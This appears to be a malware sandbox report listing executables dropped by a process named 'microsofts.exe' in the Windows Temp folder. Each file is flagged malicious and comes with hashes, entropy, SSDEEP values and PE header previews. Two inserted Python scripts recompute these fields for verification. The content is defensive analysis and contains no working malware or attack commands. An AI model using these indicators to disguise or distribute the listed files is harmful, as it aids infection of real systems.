SHA-512:9B0A57581710CB52BFA6BCED9FAA2F0D11727AE34FDE2DB88935A26D1E5271A5A871C8C3D3084ECBC15291E1869BC11238BAA7405247B414896AC7B701E4868D
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032934343478908
Encrypted:false
SSDEEP:12288:1Q5yXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:mosqjnhMgeiCl7G0nehbGZpbD
MD5:11D60763E2D9CB65C70D9C4136892CEE
SHA1:B2D6CEAE930652746297C12650A30BB8F4C50243
SHA-256:CED499BE0391048C7D487E57E1AB0F2BE3B20B70150ADF2ED57B32A3B7556CBE
SHA-512:581772F0D37CF8ED124B931F56071716F3B7AD5275E746EF06910E3EAAB76C7705B47EE6816AD50868DC6457602D0D0E820BA633B4DFBC98E6B463E17726B022
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032971980019804
Encrypted:false
SSDEEP:12288:0V/qXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wCsqjnhMgeiCl7G0nehbGZpbD
MD5:6E6284CBC520C2E9623AE72E7937580C
SHA1:E0D11756ABEC6F84610F461DF2E738C43741FF7E
SHA-256:32AB6727DB4581461ADCE1FE3A384CB606E6A0A7CBC70FEF41A8AF611B57FB81
SHA-512:0B7DFB586CF6966C79DC88C870AC41DD0EE37D08F98BC0A4B1268942FE645CF9E9D7516C093C99FE0EA8FB3B39280A58A64FA30C0BD7EDEE689695C1B87F0521
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................W.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032873899540693
Encrypted:false
SSDEEP:12288:BZm6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:v3sqjnhMgeiCl7G0nehbGZpbD
MD5:EEF9BCD7D0C840E251CBF916AF240D36
SHA1:F27F2D0E00D042626E9BF254E6BC57E4062A5164
SHA-256:C6A02FB5FC6E99308A5FC9653B9AAB09D195CF77BE691A57204C791B90BFBEA7
SHA-512:12A2F55C0B7BFEB52AAFDC9A6FCDC8B0D84D83A660F21032162ACF57FC3DEA33DA7CE19D0EBFAF7ED900600956BF3788069BC7E5AF2138F53753BA19539E92F3
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032924671052265
Encrypted:false
SSDEEP:12288:veSbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:WqsqjnhMgeiCl7G0nehbGZpbD
MD5:29957462739738A71818F933A1CFF1F3
SHA1:B18A1CF5F4AC2B4B0C90CB9E9AB5418E640AEDDC
SHA-256:6288CF07E9B2C558A72C594049D5A66C52AC9DF29313200061749F0867B7D704
SHA-512:9EC3AD62D7D7D032013EFC1CB59D9BE67999941F2C3C3F1E407F04E6C23688189439CF5A6AE548D845A5E6C97549BA83B22DFB33AF2CBE8FD5EEE8DFA4BB3EB5
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.03299173076368
Encrypted:false
SSDEEP:12288:25/jXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iLsqjnhMgeiCl7G0nehbGZpbD
MD5:2A5AB3001068332970273A03B8A67ACE
SHA1:57115755C812FE4D32CB9F64D4E032806516AD8D
SHA-256:B55E89C32A058064466EE0B3EA3F96E653D6EBB8BDE694323DC36F49EEB59B79
SHA-512:DD2C881F2883F219BAAFDB4CD20B5B9F23D91DFAEC2014DB6F86FBB7612C8E00102658D92D5F79F77961DAE9E8774552C7147EDE2364BFEAE9A358C21E2E65E0
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1202688
Entropy (8bit):5.098064262875313
Encrypted:false
SSDEEP:12288:t75Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:t75sqjnhMgeiCl7G0nehbGZpbD
MD5:60C98C5C4A835402A68F231F3C7B3154
SHA1:AD533BBA7806ED1FBF6F87FF8D1BC7261800F31C
SHA-256:DC0F59F298779069FBFEE17E4F50E7BBC99FBDC67A9D15FD06A446A0C556F826
SHA-512:D839B591B2DD7B77E283A4024A8B4AC92ACC6C6C06A59E60AC6E98E07502A0E71CA8AA3235E0F26C2FF855559ACB7134CFDCC2827730BB4BDAACD33347F84939
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.................................F...........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................
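The dropped-file records above are all derived from the raw bytes of each file: "File Type" comes from the MZ/PE headers, "Entropy (8bit)" is the Shannon entropy of the byte distribution, the MD5/SHA digests are plain cryptographic hashes, and "Preview" is the first bytes rendered with non-printable characters as dots (the "L" visible right after "PE.." in every preview is the low byte of the i386 machine type 0x014C). The script below is an added example, not code from the report or from Joe Sandbox; it reconstructs those fields locally so you can verify a dropped file from your own copy. It builds a minimal constructed PE32 header as its input (an assumption for offline use; in practice you would read the dropped file's bytes). SSDEEP is not reproduced because it needs a third-party library.

```python
import hashlib
import math
import struct

MACHINE_NAMES = {0x014C: "Intel 80386", 0x8664: "x86-64"}
SUBSYSTEM_NAMES = {2: "GUI", 3: "console"}


def build_stub(subsystem: int, machine: int = 0x014C,
               sections=(b".text", b".rdata")) -> bytes:
    """Constructed minimal PE32 image used as test input (not a real sample).

    Layout: 64-byte DOS header whose e_lfanew points to 'PE\\0\\0', then the
    20-byte IMAGE_FILE_HEADER, a 224-byte PE32 optional header and one
    40-byte section header per name.
    """
    e_lfanew = 0x80
    dos = bytearray(b"MZ" + b"\x00" * 58 + struct.pack("<I", e_lfanew))
    dos += b"\x00" * (e_lfanew - len(dos))
    opt_size = 224  # SizeOfOptionalHeader for PE32 with 16 data directories
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_hdr = struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0,
                           opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)       # Magic: PE32
    struct.pack_into("<H", opt, 68, subsystem)  # Subsystem field offset
    secs = b"".join(name.ljust(8, b"\x00") + b"\x00" * 32 for name in sections)
    return bytes(dos) + b"PE\x00\x00" + file_hdr + opt + secs


def parse_pe(data: bytes) -> dict:
    """Recover the 'File Type' line and section names from MZ/PE headers."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    sec_tab = opt + opt_size
    names = []
    for i in range(nsec):
        raw = data[sec_tab + 40 * i: sec_tab + 40 * i + 8]
        names.append(raw.rstrip(b"\x00").decode("ascii", "replace"))
    bits = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, f"magic 0x{magic:x}")
    return {
        "file_type": f"{bits} executable ({SUBSYSTEM_NAMES.get(subsystem, subsystem)}) "
                     f"{MACHINE_NAMES.get(machine, hex(machine))}, for MS Windows",
        "machine": machine,
        "subsystem": subsystem,
        "sections": names,
    }


def entropy_8bit(data: bytes) -> float:
    """Shannon entropy over byte values, 0.0 (constant) to 8.0 (uniform)."""
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def digests(data: bytes) -> dict:
    """MD5/SHA1/SHA-256/SHA-512 in the upper-case form the report uses."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def preview(data: bytes, n: int = 96) -> str:
    """Mirror the Preview column: printable ASCII kept, everything else as '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:n])


def triage(data: bytes) -> dict:
    """Assemble the same fields the report lists for a dropped file."""
    info = parse_pe(data)
    return {"file_type": info["file_type"], "size": len(data),
            "entropy": entropy_8bit(data), **digests(data),
            "preview": preview(data), "sections": info["sections"]}


if __name__ == "__main__":
    for name, blob in (("console", build_stub(3)), ("gui", build_stub(2))):
        for k, v in triage(blob).items():
            print(f"{name}: {k}: {v}")
```

Several of the dropped files above share a size of 1142272 bytes and the same SSDEEP chunk tail while their MD5/SHA digests differ; running `triage` over your own copies lets you confirm the sizes, hashes and entropies against the report rather than trusting the listing alone.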

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142784
Entropy (8bit):5.03232851360106
Encrypted:false
SSDEEP:12288:lKQXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:EosqjnhMgeiCl7G0nehbGZpbD
MD5:2E170050D3329EE64E1EEE2BE61F6F4C
SHA1:D957ED473EE9124D37C631CE31BCE0F6A34F9657
SHA-256:8A317EAD876F687FC1A917747E83FD20CAE5F5C50CA8D4FE4E225507856A664D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4EDF6626B2A67D6D09B0AAD3B6A8E74A9DE37A9C362DAF412B675DECF77C1E0543ED89758C47FB762F1E2EA236F65A72E52CE571318183A0C5721A12E5E6829E
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................................................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1298944
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.249110435267875
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:Ai7l/3roA1sqjnhMgeiCl7G0nehbGZpbD:jl/roApDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07BD344D2FE998BD4BFAA65EBDE269D7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:73CC2C6B402C89117EE395D91B265177D193A8F9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0BD0C45246EFCACE51FE7218D182BB5841658CFA2C6EF435CD2B74D251DF962A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:732B8643820315DB34F5D0D2530D64569DDD48ECA981C19AB42873911AF8A3B02CB9D2B403C0A451D33624A8D7619B62CEE1E1CD3F1C39E51D4B4E2C8226D694
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0..........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1269248
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.286892466733821
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:g5bfQnBXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:gNfQnBsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:90EEE11FBB35305C1727907600BFE070
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:57938B9EEB63E5D664ED96BFCF32DEAB3D6F7339
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E3FF786F4D696AFDBCF0258F9DCBB71BD1BC06B7F2E777E7F34D90E81C402778
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4F09969201B704A6589A65C4AE29195DE3C701E4BE63863188561D96CC22527FCAA57C8B7B7126E04BD32DC4DB5D512F4AA6D57B969A27BBC1DFDBEC8E4953D8
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................................................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1287680
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.303368385630805
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:fNmt0LDILi21iXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:CLiNsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:55EBA4BD88554CD4827DABEFB5F96792
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CF15D90F5977B6DA3FD0B5A210C23C468EE09C0E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:64A74A5375C6189D6DD6E3D83BE7CAA3CA332C833FAD49F6B3D338274FB52B30
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A52867477055AA26BD6358F5CF0E0D9930DA7168DFB9F9518FF231AA5363E2A300A33C1AEADAC8E72BDDF283C48EAFA662BDC45E3163687A3D7EB8090E2293DD
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.............................................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1287680
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3033742079733255
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:8Nmt0LDILi21iXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:DLiNsqjnhMgeiCl7G0nehbGZpbD
MD5:4EBF444F9F4521A64E6FB20FA2484387
SHA1:502A42654AF7DBDC1E9065FCCB65170BE0915E1F
SHA-256:551FDD371E11D4DEAE3AAE65276A585194B6511F175666540F6FA4796ECF0E1E
SHA-512:5B29701C7139AA0A59DF9D66A4C5EDDC614171E14288657F8C2C23588028ACED8B6AE469E93EC18C7FDB62503C0262F8D5B26C9F6C4E9544E04336625C3EF1DC
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..................................o........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1343488
Entropy (8bit):5.236066125626409
Encrypted:false
SSDEEP:12288:NjuozQMGNUbT5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:1fNsqjnhMgeiCl7G0nehbGZpbD
MD5:22ADB3760E10076EDCDA8CC14642F200
SHA1:DF89FBD90F29D7D08B08821F33365ECC96DDE0C8
SHA-256:F64A6ED396696E347CF8321E8E74BE490B14450196AFB68628631C5528625259
SHA-512:6939B448901F95B3335056C95C219C04C77F970E80D0A2B7334C4E956899E30EC99F7497065285DED9FF0FE6B21E6EC6C1E1E1702654786FF424627ECDB37633
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.......................................... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1496064
Entropy (8bit):5.577963423730056
Encrypted:false
SSDEEP:24576:RbUO42i/EssqjnhMgeiCl7G0nehbGZpbD:RJYDmg27RnWGj
MD5:068990A72BA652AC7C082F85EC516E8D
SHA1:D1BCFC0A84C91BE8CF755FBBADBB18C13F495E94
SHA-256:885CDEC8958F169145B7169664D66214543AAD7A4CF2AB32B1767C63E446F05B
SHA-512:0DA4085548652A52F5A54E6B7E7C2322767AFAB774D6262705DC285B46E6EE937D407F789DB10E8F0C0AFD8DDEC207BE2ABF42782A52C2CA0E699900865EC990
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@.......................... ................... ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):52712960
Entropy (8bit):7.9618389205833076
Encrypted:false
SSDEEP:1572864:ZLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:ZicZmsR3Lo/cnLe
MD5:C31D3C12312BEDB269BB030621A4D717
SHA1:E4D413C4DD7DCC6516F3D21520EDD649FA7AE4BE
SHA-256:62757CC100A2E05326E2E67E0B348D96FB5265BD39129768187A9335BB1C7663
SHA-512:ADC219B978C854FF8A2045C56578BDED11502F0C7DBA9EE3DFD4023680D01ED0BD8AE45CF12AFFBD859D170CD288716764B3595BDF00764F3D361000F8CF524A
Malicious:true
Reputation:unknown
Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.......$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1657344
Entropy (8bit):5.6351399002276406
Encrypted:false
SSDEEP:24576:vE8DMeflpnIOvYUxsqjnhMgeiCl7G0nehbGZpbD:vtDD9pnIOTDmg27RnWGj
MD5:3A3AAAAE29AD402FBA7ADCE7EC3F959C
SHA1:7337DC414993168FE2382EE967539BB73D2F6356
SHA-256:CB4F4C83BD6A586169A3B81E989563DE650DDF04A01ED6541DE820300D4EBB76
SHA-512:B0E87B96CD92C6393C7223E05B7A4265EFFCE4DEFE66B7B4484C5759AF5015607AABEBB9E83D58C12EB5185CF946C5A17B6B232AAD9F2B432AD3D38FFDAC3CAD
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@.....................................,.... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................
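The dropped-file records above each carry the same triage fields: cryptographic hashes, size, 8-bit entropy and a libmagic-style "File Type" string derived from the PE headers. The script below is an added example (not Joe Sandbox code and not part of this report) that reproduces those fields for arbitrary bytes, so an analyst can verify an artifact recovered from a host against the values listed here. It builds two minimal PE images in memory as constructed test input; the wording of the File Type string mirrors libmagic's output and is an assumption about formatting, not a guarantee of byte-for-byte agreement with the sandbox. SSDEEP is left out because it needs a third-party library.

```python
import hashlib
import math
import struct
from collections import Counter

# Machine and subsystem names in the style libmagic prints them (assumed wording).
MACHINES = {0x14C: "Intel 80386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "Aarch64"}
SUBSYSTEMS = {1: "native", 2: "GUI", 3: "console", 9: "Windows CE", 10: "EFI application"}
IMAGE_FILE_DLL = 0x2000


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), i.e. the report's 'Entropy (8bit)'.

    Values near 8.0 mean the bytes are close to uniformly distributed, which is what
    compressed or encrypted payloads (and packed executables) look like.
    """
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_file_type(data: bytes):
    """Classify a PE image from its headers ('PE32+ executable (console) x86-64, for MS Windows').

    Returns None for anything that is not a well-formed PE header so the caller can fall back to 'data'.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]          # offset of the 'PE\0\0' signature
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    #              NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, _, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt_size < 70 or opt + opt_size > len(data):
        return None
    magic = struct.unpack_from("<H", data, opt)[0]               # 0x10B = PE32, 0x20B = PE32+
    fmt = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic)
    if fmt is None:
        return None
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]      # same offset in PE32 and PE32+
    dll = "(DLL) " if chars & IMAGE_FILE_DLL else ""
    return (f"{fmt} executable {dll}({SUBSYSTEMS.get(subsystem, 'unknown')}) "
            f"{MACHINES.get(machine, hex(machine))}, for MS Windows")


def describe(data: bytes) -> dict:
    """Produce the per-file fields the sandbox report lists, upper-case hex like the report."""
    return {
        "size": len(data),
        "entropy": round(shannon_entropy(data), 6),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        "file_type": pe_file_type(data) or "data",
    }


def build_pe(machine: int, magic: int, subsystem: int, characteristics: int = 0x0022,
             payload: bytes = b"") -> bytes:
    """Constructed minimal PE header (no sections) used only as sample input for this example."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 240 if magic == 0x20B else 224
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + payload


if __name__ == "__main__":
    samples = {
        "x64 console": build_pe(0x8664, 0x20B, 3),
        "x86 GUI":     build_pe(0x14C, 0x10B, 2),
        "x86 GUI, high-entropy payload": build_pe(0x14C, 0x10B, 2, payload=bytes(range(256)) * 64),
    }
    for name, blob in samples.items():
        fields = describe(blob)
        print(f"== {name}")
        for key, value in fields.items():
            print(f"{key}:{value}")
```

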